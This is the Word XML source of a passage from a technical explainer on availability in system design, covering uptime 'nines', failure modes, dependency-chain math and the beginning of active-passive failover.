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0BCDE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA4420" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Availability Really Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014514C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability is the proportion of time a system is operational and accessible to serve requests. It's expressed as a percentage of uptime over a given period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167FAA00" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA9903A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160ECCD3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability = Uptime / (Uptime + Downtime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D486A1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The industry uses "nines" notation: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61"/>
        <w:gridCol w:w="1851"/>
        <w:gridCol w:w="2085"/>
        <w:gridCol w:w="2304"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="68F39BF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3DAF60" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nines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7DA408" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Availability %</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0A9C8C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Downtime/Year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24984C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD5AD3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Downtime/Month</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="3C1D51C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B30C0C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Two 9s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E226D7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99%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F8D0F5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>3.65 days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753273" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>7.3 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="4B3CE16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D602C6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Three 9s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353F77" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99.9%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D0BAC1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>8.76 hours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996823" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>43.8 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="0489007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9F17D5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Four 9s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623F29" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99.99%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1E009B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>52.6 minutes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0A05AF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>4.38 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w14:paraId="0DE7D98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E297E4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>Five 9s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E9B915" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>99.999%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6E1765" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>5.26 minutes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846372" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
            <w:r w:rsidRPr="00AD5AD3">
              <w:t>26.3 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12907346" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Achieving each additional "nine" is exponentially harder and more expensive. Going from 99.9% to 99.99% doesn't just mean "a bit better" — it requires fundamentally different architectural patterns, operational discipline, and investment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA3017F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="720C5DFB">
          <v:rect id="_x0000_i1685" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D4066" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Availability vs. Reliability vs. Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C6C09" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>These are related but distinct:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77696D15" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — Can the system respond right now?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228ABA56" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — Does the system produce correct results consistently over time?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B4AE3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — Can the system continue operating when components fail?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514B18C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A system can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>available but unreliable</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (responds, but gives wrong answers). A system can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reliable but unavailable</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (when it's up, it's perfect — but it's frequently down for maintenance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EBFB7C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Fault tolerance is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> through which you achieve high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591BA3A7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="5F7E55AD">
          <v:rect id="_x0000_i1686" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462352E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Failure Modes — Understanding What Kills Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169EF4B0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Hardware Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1DC8A5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disk failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Mean Time Between Failures (MTBF) for an enterprise HDD is ~1.2 million hours. In a cluster of 10,000 disks, you statistically lose ~8 disks per day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A7516F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Power supplies, memory modules, NICs — all have failure rates. At scale, something is always broken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEBF3F4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Switch failures, cable cuts, NIC flaps, BGP misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFAAF62" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> At scale, failure is not an exception — it's a constant. Google's published data shows that in a cluster of 1,800 machines over a year, ~1,000 individual machine failures occur, ~20 rack failures, and ~5 cluster-level events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2710FB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Software Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C32082" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> causing OOM kills</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C30554" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deadlocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> under specific concurrency patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B022C8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cascading failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — one service's failure overloads another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433467F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — the #1 cause of outages at major companies (studies from Google, Microsoft, Facebook confirm this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E244915" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Dependent Service Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31148764" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Your system's availability is bounded by its dependencies. If Service A (99.9%) depends on Service B (99.9%) serially:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9ADC38" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF48D3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Combined Availability = 0.999 × 0.999 = 0.998 (99.8%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2299C9DB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>With 5 serial dependencies each at 99.9%:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E18C23" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C9C951" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Combined = 0.999^5 = 0.995 (99.5%) — that's 1.83 days of downtime/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D27E1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dependency chain problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> and is critical to understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2FC6EB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="0CA9B27B">
          <v:rect id="_x0000_i1687" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEEF997" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Redundancy — The Foundation of High Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9F5FD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.1 Active-Passive (Failover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538EC68C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763C852" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A primary node handles all traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A08B500" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A standby node maintains a synchronized state (via replication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B149837" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failure detection mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (heartbeat/health check) monitors the primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020604D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Upon detecting failure, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failover controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> promotes the standby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B6095" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The critical details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16552293" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detection time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How quickly do you notice the primary is down? Typical heartbeat intervals are 1–5 seconds, with failure declared after 2–3 missed beats. So detection alone costs 3–15 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C3133" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Promotion time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The standby must acquire the VIP (Virtual IP), load state, open connections, warm caches. This can take 5–60 seconds.</w:t>
      </w:r>
    </w:p>
